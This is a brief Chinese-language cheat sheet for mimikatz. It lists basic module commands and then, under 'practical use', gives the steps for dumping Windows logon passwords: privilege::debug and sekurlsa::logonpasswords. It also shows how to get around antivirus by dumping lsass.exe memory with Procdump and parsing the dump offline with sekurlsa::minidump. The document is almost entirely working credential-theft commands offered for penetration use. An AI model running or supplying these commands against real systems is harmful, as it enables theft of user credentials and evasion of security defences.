mimikatz
常规命令
1.常规的操作使用命令
mimikatz # cls –>清屏,类似dos命令cls.
mimikatz # exit –>退出mimikatz.
mimikatz #version –>查看当前的mimikatz的版本.
随便输入”xxx::”,会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在,然后会列出所有可用的命令
查看列表中命令的具体参数同样可以输入”命令::”来查看,比如:”inject::”,如图:
可以看到命令inject的具体参数有pid,process,service等……
2.系统方面的操作使用命令:system
mimikatz #system::user –>查看当前登录的系统用户
mimikazt #system::computer –>返回当前的计算机名称
3.在服务器终端的操作命令: ts
mimikatz #ts::sessions –>显示当前的会话
mimikatz #ts::processes windows-d.vm.nirvana.local –>显示服务器的进程和对应的pid情况等。
4.系统服务相关的操作使用命令:service
5.系统进程相关操作的使用命令:process
6.系统线程相关操作使用命令:thread
7.系统句柄相关操作使用命令:handle
8.加密相关操作使用命令:crypto
9.注入操作使用命令:inject
## 实际运用
#抓取密码命令-->适用于win10之前的版本系统(典型win10系统抓取不到密码明文)
privilege::debug
sekurlsa::logonpasswords
渗透环境运用类
①将密码的文件导出到本地,适用于mimikatz不免杀的情况下
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
②mimikatz进行抓取
sekurlsa::minidump c:\users\test\appdata\local\temp\lsass.dmp
sekurlsa::logonpasswords